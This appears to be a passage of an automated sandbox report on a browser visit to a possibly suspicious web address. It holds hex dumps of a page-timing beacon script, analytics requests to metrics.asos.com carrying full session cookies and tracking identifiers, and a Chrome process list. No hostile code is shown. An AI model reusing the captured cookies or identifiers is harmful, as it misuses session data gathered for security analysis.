                                                                                                                                                                                                                                                                  Data Ascii: !function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r+
                                                                                                                                                                                                                                                                  2024-10-29 19:11:37 UTC1369INData Raw: 3b 69 66 28 61 5b 36 5d 3d 31 35 26 61 5b 36 5d 7c 36 34 2c 61 5b 38 5d 3d 36 33 26 61 5b 38 5d 7c 31 32 38 2c 74 29 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 31 36 3b 2b 2b 63 29 74 5b 6f 2b 63 5d 3d 61 5b 63 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 69 28 61 29 7d 7d 2c 31 36 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 31 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67
                                                                                                                                                                                                                                                                  Data Ascii: ;if(a[6]=15&a[6]|64,a[8]=63&a[8]|128,t)for(var c=0;c<16;++c)t[o+c]=a[c];return t||i(a)}},168:function(e,t,n){"use strict";var r=this&&this.__assign||function(){return r=Object.assign||function(e){for(var t,n=1,r=arguments.length;n<r;n++)for(var i in t=arg
                                                                                                                                                                                                                                                                  2024-10-29 19:11:37 UTC1369INData Raw: 72 63 68 50 61 72 61 6d 73 29 7b 76 61 72 20 79 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 67 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5e 5c 3f 5d 2b 5c 3f 3f 2f 2c 22 22 29 29 2c 68 3d 79 2e 67 65 74 28 22 74 6f 6b 65 6e 22 29 3b 68 26 26 28 70 2e 74 6f 6b 65 6e 3d 68 29 3b 76 61 72 20 54 3d 79 2e 67 65 74 28 22 73 70 61 22 29 3b 70 2e 73 70 61 3d 6e 75 6c 6c 3d 3d 3d 54 7c 7c 22 74 72 75 65 22 3d 3d 3d 54 7d 7d 70 26 26 22 6d 75 6c 74 69 22 21 3d 3d 70 2e 6c 6f 61 64 26 26 28 70 2e 6c 6f 61 64 3d 22 73 69 6e 67 6c 65 22 29 2c 77 69 6e 64 6f 77 2e 5f 5f 63 66 42 65 61 63 6f 6e 3d 70 7d 69 66 28 73 26 26 70 26 26 70 2e 74 6f 6b 65 6e 29 7b 76 61 72 20 77 2c 53 2c 62 3d 21 31 3b 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74
                                                                                                                                                                                                                                                                  Data Ascii: rchParams){var y=new URLSearchParams(g.replace(/^[^\?]+\??/,"")),h=y.get("token");h&&(p.token=h);var T=y.get("spa");p.spa=null===T||"true"===T}}p&&"multi"!==p.load&&(p.load="single"),window.__cfBeacon=p}if(s&&p&&p.token){var w,S,b=!1;document.addEventList
                                                                                                                                                                                                                                                                  2024-10-29 19:11:37 UTC1369INData Raw: 2e 74 69 6d 69 6e 67 73 56 32 3d 7b 7d 2c 64 2e 76 65 72 73 69 6f 6e 73 2e 74 69 6d 69 6e 67 73 3d 32 2c 64 2e 64 74 3d 6d 5b 30 5d 2e 64 65 6c 69 76 65 72 79 54 79 70 65 2c 64 65 6c 65 74 65 20 64 2e 74 69 6d 69 6e 67 73 2c 74 28 6d 5b 30 5d 2c 64 2e 74 69 6d 69 6e 67 73 56 32 29 29 7d 31 3d 3d 3d 64 2e 76 65 72 73 69 6f 6e 73 2e 74 69 6d 69 6e 67 73 26 26 74 28 63 2c 64 2e 74 69 6d 69 6e 67 73 29 2c 74 28 75 2c 64 2e 6d 65 6d 6f 72 79 29 7d 65 6c 73 65 20 4f 28 64 29 3b 72 65 74 75 72 6e 20 64 2e 66 69 72 73 74 50 61 69 6e 74 3d 6b 28 22 66 69 72 73 74 2d 70 61 69 6e 74 22 29 2c 64 2e 66 69 72 73 74 43 6f 6e 74 65 6e 74 66 75 6c 50 61 69 6e 74 3d 6b 28 22 66 69 72 73 74 2d 63 6f 6e 74 65 6e 74 66 75 6c 2d 70 61 69 6e 74 22 29 2c 70 26 26 28 70 2e 69 63
                                                                                                                                                                                                                                                                  Data Ascii: .timingsV2={},d.versions.timings=2,d.dt=m[0].deliveryType,delete d.timings,t(m[0],d.timingsV2))}1===d.versions.timings&&t(c,d.timings),t(u,d.memory)}else O(d);return d.firstPaint=k("first-paint"),d.firstContentfulPaint=k("first-contentful-paint"),p&&(p.ic
                                                                                                                                                                                                                                                                  2024-10-29 19:11:37 UTC1369INData Raw: 65 72 65 64 3a 21 30 7d 7d 3b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 52 28 29 3a 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 52 29 7d 29 29 3b 76 61 72 20 41 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4c 26 26 30 3d 3d 3d 76 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 69 64 3d 3d 3d 6c 7d 29 29 2e 6c 65 6e 67 74 68 7d 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 2e 70 75 73 68 28 7b 69 64 3a 6c 2c 75 72 6c 3a 65 2c 74 73 3a 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65
                                                                                                                                                                                                                                                                  Data Ascii: ered:!0}};"complete"===window.document.readyState?R():window.addEventListener("load",(function(){window.setTimeout(R)}));var A=function(){return L&&0===v.filter((function(e){return e.id===l})).length},_=function(e){v.push({id:l,url:e,ts:(new Date).getTime
                                                                                                                                                                                                                                                                  2024-10-29 19:11:37 UTC1369INData Raw: 72 63 65 4c 6f 61 64 54 69 6d 65 2c 45 2e 6c 63 70 2e 65 72 64 3d 63 2e 65 6c 65 6d 65 6e 74 52 65 6e 64 65 72 44 65 6c 61 79 2c 45 2e 6c 63 70 2e 69 74 3d 6e 75 6c 6c 3d 3d 3d 28 69 3d 63 2e 6c 63 70 52 65 73 6f 75 72 63 65 45 6e 74 72 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 69 6e 69 74 69 61 74 6f 72 54 79 70 65 2c 45 2e 6c 63 70 2e 66 70 3d 6e 75 6c 6c 3d 3d 3d 28 61 3d 6e 75 6c 6c 3d 3d 3d 28 6f 3d 63 2e 6c 63 70 45 6e 74 72 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 65 6c 65 6d 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 66 65 74 63 68 70 72 69 6f 72 69 74 79 22 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 49 4e 50 22
                                                                                                                                                                                                                                                                  Data Ascii: rceLoadTime,E.lcp.erd=c.elementRenderDelay,E.lcp.it=null===(i=c.lcpResourceEntry)||void 0===i?void 0:i.initiatorType,E.lcp.fp=null===(a=null===(o=c.lcpEntry)||void 0===o?void 0:o.element)||void 0===a?void 0:a.getAttribute("fetchpriority"));break;case"INP"
                                                                                                                                                                                                                                                                  2024-10-29 19:11:37 UTC1369INData Raw: 64 65 64 42 6f 64 79 53 69 7a 65 26 26 28 72 2e 64 65 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 3d 6e 5b 30 5d 2e 64 65 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 29 2c 65 2e 64 74 3d 6e 5b 30 5d 2e 64 65 6c 69 76 65 72 79 54 79 70 65 29 2c 74 28 72 2c 65 2e 74 69 6d 69 6e 67 73 56 32 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 29 7b 76 61 72 20 74 3b 69 66 28 22 66 69 72 73 74 2d 63 6f 6e 74 65 6e 74 66 75 6c 2d 70 61 69 6e 74 22 3d 3d 3d 65 26 26 45 2e 66 63 70 26 26 45 2e 66 63 70 2e 76 61 6c 75 65 29 72 65 74 75 72 6e 20 45 2e 66 63 70 2e 76 61 6c 75 65 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 29 7b 76 61 72 20 6e 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 73 2e 67 65 74 45 6e 74 72 69
                                                                                                                                                                                                                                                                  Data Ascii: dedBodySize&&(r.decodedBodySize=n[0].decodedBodySize),e.dt=n[0].deliveryType),t(r,e.timingsV2)}}function k(e){var t;if("first-contentful-paint"===e&&E.fcp&&E.fcp.value)return E.fcp.value;if("function"==typeof s.getEntriesByType){var n=null===(t=s.getEntri
                                                                                                                                                                                                                                                                  2024-10-29 19:11:37 UTC1369INData Raw: 76 65 6e 74 54 79 70 65 3d 7b 7d 29 29 5b 72 2e 4c 6f 61 64 3d 31 5d 3d 22 4c 6f 61 64 22 2c 72 5b 72 2e 41 64 64 69 74 69 6f 6e 61 6c 3d 32 5d 3d 22 41 64 64 69 74 69 6f 6e 61 6c 22 2c 72 5b 72 2e 57 65 62 56 69 74 61 6c 73 56 32 3d 33 5d 3d 22 57 65 62 56 69 74 61 6c 73 56 32 22 2c 28 6e 3d 74 2e 46 65 74 63 68 50 72 69 6f 72 69 74 79 7c 7c 28 74 2e 46 65 74 63 68 50 72 69 6f 72 69 74 79 3d 7b 7d 29 29 2e 48 69 67 68 3d 22 68 69 67 68 22 2c 6e 2e 4c 6f 77 3d 22 6c 6f 77 22 2c 6e 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 2c 31 30 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77
                                                                                                                                                                                                                                                                  Data Ascii: ventType={}))[r.Load=1]="Load",r[r.Additional=2]="Additional",r[r.WebVitalsV2=3]="WebVitalsV2",(n=t.FetchPriority||(t.FetchPriority={})).High="high",n.Low="low",n.Auto="auto"},104:function(e,t){!function(e){"use strict";var t,n,r,i,o,a=function(){return w
                                                                                                                                                                                                                                                                  2024-10-29 19:11:37 UTC1369INData Raw: 30 3f 72 3d 22 70 72 65 72 65 6e 64 65 72 22 3a 64 6f 63 75 6d 65 6e 74 2e 77 61 73 44 69 73 63 61 72 64 65 64 3f 72 3d 22 72 65 73 74 6f 72 65 22 3a 6e 2e 74 79 70 65 26 26 28 72 3d 6e 2e 74 79 70 65 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 2d 22 29 29 29 2c 7b 6e 61 6d 65 3a 65 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 3d 3d 3d 74 3f 2d 31 3a 74 2c 72 61 74 69 6e 67 3a 22 67 6f 6f 64 22 2c 64 65 6c 74 61 3a 30 2c 65 6e 74 72 69 65 73 3a 5b 5d 2c 69 64 3a 22 76 33 2d 22 2e 63 6f 6e 63 61 74 28 44 61 74 65 2e 6e 6f 77 28 29 2c 22 2d 22 29 2e 63 6f 6e 63 61 74 28 4d 61 74 68 2e 66 6c 6f 6f 72 28 38 39 39 39 39 39 39 39 39 39 39 39 39 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2b 31 65 31 32 29 2c 6e 61 76 69 67 61 74 69 6f 6e 54 79 70 65 3a 72 7d 7d 2c
                                                                                                                                                                                                                                                                  Data Ascii: 0?r="prerender":document.wasDiscarded?r="restore":n.type&&(r=n.type.replace(/_/g,"-"))),{name:e,value:void 0===t?-1:t,rating:"good",delta:0,entries:[],id:"v3-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:r}},
                                                                                                                                                                                                                                                                  2024-10-29 19:11:37 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 62 2c 21 30 29 2c 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 72 65 72 65 6e 64 65 72 69 6e 67 63 68 61 6e 67 65 22 2c 62 2c 21 30 29 7d 2c 43 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 3c 30 26 26 28 77 3d 53 28 29 2c 45 28 29 2c 6c 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 3d 53 28 29 2c 45 28 29 7d 29 2c 30 29 7d 29 29 29 2c 7b 67 65 74 20 66 69 72 73 74 48 69 64 64 65 6e 54 69 6d 65 28 29 7b 72 65 74 75 72 6e 20 77 7d 7d 7d 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 64 6f 63 75 6d 65 6e 74 2e 70
                                                                                                                                                                                                                                                                  Data Ascii: function(){removeEventListener("visibilitychange",b,!0),removeEventListener("prerenderingchange",b,!0)},C=function(){return w<0&&(w=S(),E(),l((function(){setTimeout((function(){w=S(),E()}),0)}))),{get firstHiddenTime(){return w}}},P=function(e){document.p


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  133192.168.2.164997863.140.62.174437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:39 UTC3864OUTGET /b/ss/asoscomprod/1/JS-2.1.0/s62048325749810?AQB=1&ndh=1&pf=1&t=29%2F9%2F2024%2015%3A11%3A26%202%20240&mid=91889772507628273200045547028246444940&aamlh=6&ce=UTF-8&ns=asos&pageName=desktop%20com%7Chome%20page%7Chome&g=https%3A%2F%2Fwww.asos.com%2F&r=https%3A%2F%2Fusqe.bin4tgla.com%2F&ch=home%20page%20&server=desktop%20com&events=event128%3D-1730229075288%2Cevent121%2Cevent79&aamb=RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y&c1=home&v1=1&c2=home&c3=home&c5=2024-10-29T19%3A11%3A26.738Z&v6=home&c8=home&c11=https%3A%2F%2Fwww.asos.com%2F&v17=New&v19=1280%3A907&v29=1582&v30=-1730229075288&c39=mw%20brand%201%2Cmw%20brand%202%2Cmw%20brand%203%2Cmw%20brand%204%2Cww%20brand%201%2Cww%20brand%202%2Cww%20brand%203%2Cww%20brand%204%2Cshop%20mw%20brands%20cta%2Cshop%20ww%20brands%20cta%2Cfeature%201%2Cfeature%202%2Cfeature%203%2Cfeature%204%2Chero%2Cthe%20biggest%20labels%20title%2Cwomens%20categories%20title%2Cww%20uk%20seo%20links%2Cmens%20categories%20title%2Cmw%20uk%20seo%20links%2C&v60=home&v61=home&v112=gb& [TRUNCATED]
                                                                                                                                                                                                                                                                  Host: metrics.asos.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: geocountry=US; bm_sz=C6560B727C2E1BF7EC11CF61B16D1E2E~YAAQF/AQAs6QNNOSAQAATIew2RkiZ/ZFgWnTEcjtF1YaHy4fTiDqA4YcAxn5LnPjd6nAu6Q8tI4u6cQ8aUQpwDx52fWnmHn7LhdnQYo16QT3VxROCl0UacXgIO6TElARdeB3WlPOPtcSTCqfZiioRMdAPSc/e7pRvfJ8Gn5PQfQTKJKIbExIKndW3WhD8WYCqneLiW+SD6digNqWAZXhXB39PnjIiLQZtCsOLnFIPAJpTXop0cW+dff89Q24Q/es+IM8boOQqu3n7toc0jHhG0aXEHo2SHvvOdsVLISJ6tZimh2dhEwu/aI6e0gvNy5uv0WlhzhgynlnlV2lvgg9acPb+jW1f7KuRTVGjhVyV+HGMnJTJj8kAaCzzjv0H0X3Doo=~4404018~4337977; RT="z=1&dm=asos.com&si=6d56e97d-38ce-4cc7-9878-1f9d780233d1&ss=m2utpuu0&sl=0&tt=0&bcn=%2F%2F684dd32e.akstat.io%2F"; AMCVS_C0137F6A52DEAFCC0A490D4C%40AdobeOrg=1; s_ecid=MCMID%7C91889772507628273200045547028246444940; keyStoreDataversion=mhabj1f-41; browseCountry=GB; asos-anon12=0192d9b0a9fe75a9922bdd86c9628202; asos-ts121=0192d9b0-a9ff-7a0e-a7ac-a1c084ca85f2; s_pers=%20eVar225%3D1%7C1730230881209%3B%20s_vnum%3D1730433600214%2526vn%253D1%7C1730433600214%3B%20visitCount%3D1%7C1730230881217%3B%20s_invisit%3Dtrue%7C1730230886728%3B%20s_nr%3D1730229086730- [TRUNCATED]
                                                                                                                                                                                                                                                                  2024-10-29 19:11:39 UTC724INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                                  date: Tue, 29 Oct 2024 19:11:39 GMT
                                                                                                                                                                                                                                                                  expires: Mon, 28 Oct 2024 19:11:39 GMT
                                                                                                                                                                                                                                                                  last-modified: Wed, 30 Oct 2024 19:11:39 GMT
                                                                                                                                                                                                                                                                  pragma: no-cache
                                                                                                                                                                                                                                                                  p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                  server: jag
                                                                                                                                                                                                                                                                  set-cookie: s_ecid=MCMID%7C91889772507628273200045547028246444940; Path=/; Domain=asos.com; Max-Age=63072000; Expires=Thu, 29 Oct 2026 19:11:11 GMT;
                                                                                                                                                                                                                                                                  etag: 3715638698005069824-4618666836082486575
                                                                                                                                                                                                                                                                  vary: *
                                                                                                                                                                                                                                                                  content-type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                  content-length: 43
                                                                                                                                                                                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:11:39 UTC43INData Raw: 47 49 46 38 39 61 02 00 02 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 02 00 02 00 00 02 02 84 51 00 3b
                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,Q;


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  134192.168.2.164998263.140.62.174437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:40 UTC3633OUTGET /b/ss/asoscomprod/1/JS-2.1.0/s62048325749810?AQB=1&ndh=1&pf=1&t=29%2F9%2F2024%2015%3A11%3A26%202%20240&mid=91889772507628273200045547028246444940&aamlh=6&ce=UTF-8&ns=asos&pageName=desktop%20com%7Chome%20page%7Chome&g=https%3A%2F%2Fwww.asos.com%2F&r=https%3A%2F%2Fusqe.bin4tgla.com%2F&ch=home%20page%20&server=desktop%20com&events=event128%3D-1730229075288%2Cevent121%2Cevent79&aamb=RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y&c1=home&v1=1&c2=home&c3=home&c5=2024-10-29T19%3A11%3A26.738Z&v6=home&c8=home&c11=https%3A%2F%2Fwww.asos.com%2F&v17=New&v19=1280%3A907&v29=1582&v30=-1730229075288&c39=mw%20brand%201%2Cmw%20brand%202%2Cmw%20brand%203%2Cmw%20brand%204%2Cww%20brand%201%2Cww%20brand%202%2Cww%20brand%203%2Cww%20brand%204%2Cshop%20mw%20brands%20cta%2Cshop%20ww%20brands%20cta%2Cfeature%201%2Cfeature%202%2Cfeature%203%2Cfeature%204%2Chero%2Cthe%20biggest%20labels%20title%2Cwomens%20categories%20title%2Cww%20uk%20seo%20links%2Cmens%20categories%20title%2Cmw%20uk%20seo%20links%2C&v60=home&v61=home&v112=gb& [TRUNCATED]
                                                                                                                                                                                                                                                                  Host: metrics.asos.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: geocountry=US; bm_sz=C6560B727C2E1BF7EC11CF61B16D1E2E~YAAQF/AQAs6QNNOSAQAATIew2RkiZ/ZFgWnTEcjtF1YaHy4fTiDqA4YcAxn5LnPjd6nAu6Q8tI4u6cQ8aUQpwDx52fWnmHn7LhdnQYo16QT3VxROCl0UacXgIO6TElARdeB3WlPOPtcSTCqfZiioRMdAPSc/e7pRvfJ8Gn5PQfQTKJKIbExIKndW3WhD8WYCqneLiW+SD6digNqWAZXhXB39PnjIiLQZtCsOLnFIPAJpTXop0cW+dff89Q24Q/es+IM8boOQqu3n7toc0jHhG0aXEHo2SHvvOdsVLISJ6tZimh2dhEwu/aI6e0gvNy5uv0WlhzhgynlnlV2lvgg9acPb+jW1f7KuRTVGjhVyV+HGMnJTJj8kAaCzzjv0H0X3Doo=~4404018~4337977; RT="z=1&dm=asos.com&si=6d56e97d-38ce-4cc7-9878-1f9d780233d1&ss=m2utpuu0&sl=0&tt=0&bcn=%2F%2F684dd32e.akstat.io%2F"; AMCVS_C0137F6A52DEAFCC0A490D4C%40AdobeOrg=1; s_ecid=MCMID%7C91889772507628273200045547028246444940; keyStoreDataversion=mhabj1f-41; browseCountry=GB; asos-anon12=0192d9b0a9fe75a9922bdd86c9628202; asos-ts121=0192d9b0-a9ff-7a0e-a7ac-a1c084ca85f2; s_pers=%20eVar225%3D1%7C1730230881209%3B%20s_vnum%3D1730433600214%2526vn%253D1%7C1730433600214%3B%20visitCount%3D1%7C1730230881217%3B%20s_invisit%3Dtrue%7C1730230886728%3B%20s_nr%3D1730229086730- [TRUNCATED]
                                                                                                                                                                                                                                                                  2024-10-29 19:11:40 UTC724INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                                  date: Tue, 29 Oct 2024 19:11:40 GMT
                                                                                                                                                                                                                                                                  expires: Mon, 28 Oct 2024 19:11:40 GMT
                                                                                                                                                                                                                                                                  last-modified: Wed, 30 Oct 2024 19:11:40 GMT
                                                                                                                                                                                                                                                                  pragma: no-cache
                                                                                                                                                                                                                                                                  p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                  server: jag
                                                                                                                                                                                                                                                                  set-cookie: s_ecid=MCMID%7C91889772507628273200045547028246444940; Path=/; Domain=asos.com; Max-Age=63072000; Expires=Thu, 29 Oct 2026 19:11:11 GMT;
                                                                                                                                                                                                                                                                  etag: 3715638700152553472-4618561282966221781
                                                                                                                                                                                                                                                                  vary: *
                                                                                                                                                                                                                                                                  content-type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                  content-length: 43
                                                                                                                                                                                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:11:40 UTC43INData Raw: 47 49 46 38 39 61 02 00 02 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 02 00 02 00 00 02 02 84 51 00 3b
                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,Q;


                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                  Start time:15:09:37
                                                                                                                                                                                                                                                                  Start date:29/10/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                                  Start time:15:09:37
                                                                                                                                                                                                                                                                  Start date:29/10/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1912,i,8132146414401361413,4510033593977308464,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                  Start time:15:09:39
                                                                                                                                                                                                                                                                  Start date:29/10/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dartergary.wordpress.com/"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  No disassembly